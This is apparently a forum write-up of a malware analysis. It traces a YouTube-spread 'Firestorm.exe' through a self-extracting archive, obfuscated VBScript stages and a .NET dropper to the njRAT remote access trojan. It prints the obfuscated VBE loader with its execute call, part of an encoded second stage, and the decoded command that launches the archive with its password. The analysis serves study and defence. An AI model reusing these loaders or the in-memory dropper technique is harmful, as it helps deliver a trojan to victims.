README
If your antivirus detects this page as malicious, it is most probably because I have pasted some scripts into the article. Do not be alarmed!
Introduction
Very recently I’ve (finally) set up a proper malware analysis VM and so I thought that it would be super fun to download some samples from malware spreaders on YouTube. I came across something interesting from which I have learned and expanded my knowledge and so I thought I’d share my analytical journey with you guys in hopes that you will also learn something!
Author Assigned Level: -
Community Assigned Level:
- Newbie
- Wannabe
- Hacker
- Wizard
- Guru
0 voters
Required Skills
Nothing extraordinary, these are entirely optional and is not needed to understand the analysis.
- Visual Basic
- C# .NET
- Reverse engineering
- Forensics
- Persistence
- Common sense
Analysis
Static Analysis
VirusTotal - Firestorm.exe
With all things hacking, recon should be the first step towards understanding the target. The first thing I do is upload the sample to VirusTotal (VT) to see if this has already been detected or not, or just to try and get a general overview of what I might be dealing with.
Okay, so there are some detections but it seems to be a pretty generic and it doesn’t really help me much.
pestudio - Firestorm.exe
Since VT wasn’t helpful, I needed to get a better understanding of what this file is and what it can do. So, using pestudio, I may be able to get some hints.
We can see here there are quite a few flags being raised, most notably:
- it attempts to appear as a Microsoft executable IEXPLORE.exe which is Internet Explorer,
- it seems to have another file within,
- it references file streams so it may write to disk,
- it references cryptographic functions which may indicate some sort of obfuscation
- the debug file name is
sfxrar.pdb
which indicates a self-extracting archive, most likely WinRAR.
If we go into the manifest, we can see that it tells us that it’s a WinRAR SFX:
File Extraction with WinRAR - Firestorm.exe
Let’s open up this archive in WinRAR and see what it contains:
On the right-hand side, we can see the SFX script which details the path to where these files will extract, file execution after unpacking, silent install and file overwriting. Of course the file execution is what grabs our attention so let’s extract these files and have a look at them.
pestudio - sfx.exe
So the file name of sfx.exe
gives us a pretty good clue as to what it might be so let’s confirm with pestudio:
Yes, as we expected. Can we extract it?
Unfortunately not. So let’s continue with form1.vbe
.
Deobfuscating Visual Basic - form1.vbe
Upon opening the file, this is what we see:
TZUO3TWPSQYCGRU="RewXÞíÖK<m«¡®¬ÅÈê7<UX´Ç¦½ÊÈá.PSXqt¥¸ÐãÂÙæ.GJlotozÇÒºìû.YJ{¦¹¯¼ºÓÖBEJcfªÂÕ´ËØÖ9<^af³ÆÞñÐç><UXz}ÄÆÑèÈÃiy¦§ÄɺÊîA*[hwb¡´ÍÚÄFS8iwp¡®À¨àéMZlT
¡½ÊàÄ?LbFyp¦¯ÍÚÄFS8pyb©½ËÜÄ?L_Fw
~¯½Ð¶êD*`oT
¤½ÊÙÄGS8iwp¡®½¨ßïUbFw~¯¼Ë¶ïG*[i|b ¿Î¶îE*bkT~¯½Î¶ç>Q8iwp¡¯Â¨ÜìT]Fw~¯¼Ë¶ç>T8ivp£²ÎÙÄ?O8ivb§½ËÝÄ?L^F~p¡®À¨Ùæ?*[h~b ¶ÎÞÄFN8iwp¡¯¼¨ÛèO^Fw
~¯¼Ì¶ç@L8l|b ¯ËÚæMZiT~±¾¨ÜëM[jT~·À¨ÝìP]Fw
~´Á¨àèM[pT~¯½Ì¶îB*[ib§ÂÓ¶ìG*]mT~ ¤íĄR<s~S^ÏßæíČÈó.iy¦§ÄãîÖRaJufªÂÕ´ËØÖ9<^af³ÆÞñÐç><UXz}Ïâúč6MZXqtàâíĄ.)4
¯ÂÒ¬×Èĉ^hsnÁÑØßþÆëþ`sRivt²µÃÈÃax|f¨¤ñü.`oXt¥¸ÐãÂÙæ.GJlotÁÔìÿÞ?LJcf©¬ÝðĈeD[hf¤§¬îðû\<7BºÉáÜ÷ċ\`R
¯ÂÒµºÓÖ6<WX´Ç¦ÀÓÑß.)4~¦½Éºëþ`sRl~}ÄͬĎĝÃ`s
f§¦¤ûú.YJ¸|¯¿ÆÙìüÞ[ESXS^©¶Ò¬×ÈØu¬ÈÉäåĀĀĔĪu«ÆÉàô÷[eJuf®±ËÕºÓÖa`JEP¢§ÈÒ¬§²úWiJ{´¶Ð¬§²ûfamÄØÛõÿ7<7B¦ÂÄÞºåÖQd|n
©¬ÎÑÖ9<m«¡®¬ÅÈê7<UX´Ç¦½ÊÈá.PSXqtÑô¹üġĘoZfalµÌкñü.<7B¬ÉÐÓòõĉĖÖrR¦»}}ÿČÈó._r|Ð姤ČĨ.YJ«¸alµÌкîċ\_~¢}¤" : PZUO3TWPSQYCGRU="ZUO3TWPSQYCGRU" : CZUO3TWPSQYCGRU=len(PZUO3TWPSQYCGRU) : do until NZUO3TWPSQYCGRU=len(TZUO3TWPSQYCGRU) : NZUO3TWPSQYCGRU=NZUO3TWPSQYCGRU+1 : UZUO3TWPSQYCGRU=UZUO3TWPSQYCGRU+1 : if UZUO3TWPSQYCGRU=len(PZUO3TWPSQYCGRU) then UZUO3TWPSQYCGRU=1
WZUO3TWPSQYCGRU=WZUO3TWPSQYCGRU & ChrW(AscW(Mid(TZUO3TWPSQYCGRU, NZUO3TWPSQYCGRU, 1)) - UZUO3TWPSQYCGRU * CZUO3TWPSQYCGRU) : loop : execute WZUO3TWPSQYCGRU
and what a mess it is. Obfsucation for scripts is a very common thing so it should not come as a surprise. The problem for us is to deobfuscate it somehow. We can see that there is a string which may contain another payload once it has been deobfuscated and some function calls but it’s still very confusing and may take us some time to reverse engineer it, especially for people like me who are not quite familiar with Visual Basic.
What’s a simple way we can continue without too much effort? On the end of the script, we see an execute
function on the WZUO3TWPSQYCGRU
variable. So let’s be smart here and instead of having execute
there we force it to write the contents out to disk! After a quick Google search, it seems we just need to replace it with WScript.Echo
, then call the script using cscript.exe
(important! otherwise it will pop up a message box!). Here is the output:
(The following script has sections removed to prevent AV detection)
DIM DF
MOHMRET = "83101116328711510483104101108108326132878399114105112116466711410197116101799810610199116403487839911410511211646831041011081083441131087115104831041011081084682117110323411510212-04610112010132324511284945643110658211869112841198769693534"
END IF
mohar = MOHMRET
MOHMRT = SPLIT(mohar,CHRW(10 + 4))
END IF
EXECUTE (FLAMI)
END IF
Yes, indeed it is another payload. Again, we can see it’s obfuscated but this time, it’s makes a bit more sense. There is another potential payload held in the MOHMRET
variable which looks to be ASCII with some kind of character woven in. We can see the split
function using mohar
(MOHMRET
) and a character 10 + 4
which may confirm the assumption.
Instead of deobfuscating this file, we want to be smart so similar to the previous script, let’s replace execute
with WScript.Echo
and see what we get:
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "sfx.exe -pT^8+nARvEpTwWEE#"
There is no more obfuscation and we can see references to sfx.exe
. This script seems to be attempting to execute the other file on the command line with what is most likely the password to the archive. With a quick Google search, WinRAR takes the command line option -p
as a password parameter and with that, we have unlocked a piece of the puzzle.
Here we have yet another auto-run executable called eze.exe
. Let’s extract it and perform some more analysis.
pestudio - eze.exe
Looking at the indicators in pestudio, we can see that it fakes itself in order to look like a Microsoft executable. We can also see that it may be a .NET file and looking at the name WindowsFormsApp1.exe
tells us that this project may have taken a default name when it was coded, i.e. a C# Windows Form project.
Moving onto the VT indicators (the sample must already exist on VT), we can see that it may be a dropper:
Let’s take a look at the strings since it might provide us with the file names of the file it may drop:
And quite some interesting strings we have here. Greetings, Mr. Stan! If you are reading this, you are violating rule number 5 of the CIA’s Development Tradecrafts DOs and DON’Ts. Here’s the link, just for you! Don’t be surprised if cops show up at the front of your door!
We can confirm the project development under Visual Studio 2017 as we suspected from the default project name. The string that is listed after looks like it may be the location from where the dropper obtains its payload. If we navigate to the page, we get an error:
So it may seem that the file is not a PNG at all, or any type of image file.
Dynamic Analysis
dnSpy - eze.exe
We would love to see the file that is dropped by this file and of course it can easily be obtained just by downloading the file but just to spice things up, let’s look at how we can get it via dynamic analysis. Open up eze.exe
in dnSpy and let’s see what it does.
In the red box, we can see a call to a very common method call Assembly.Load
. This function is mostly used to load a malicious file into memory for execution as indicated by the EntryPoint.Invoke
method call. For an example of this, see @TheDoctor’s [C#] A Simple Runtime Crypter article.
To get the binary file, we simply place a breakpoint on this line and run it until it gets hit (mind the sleep at the beginning!)…
… look in the variable’s (array
) memory (right-click the variable in the Locals
tab at the bottom, select Show in Memory Window
and then choose a memory view)…
… and there lies the binary we were looking for! Identify the MZ
magic and the PE\0\0
signatures to verify. Right-click the memory and select Save Selection...
.
Let’s see what VT has for us.
55/67 detections! Identified as Bladabindi
AKA njRAT.
Conclusions
I hope this was an entertaining and educational read! Thanks for stopping by!
EDIT:
The sample can now be obtained here:
– dtm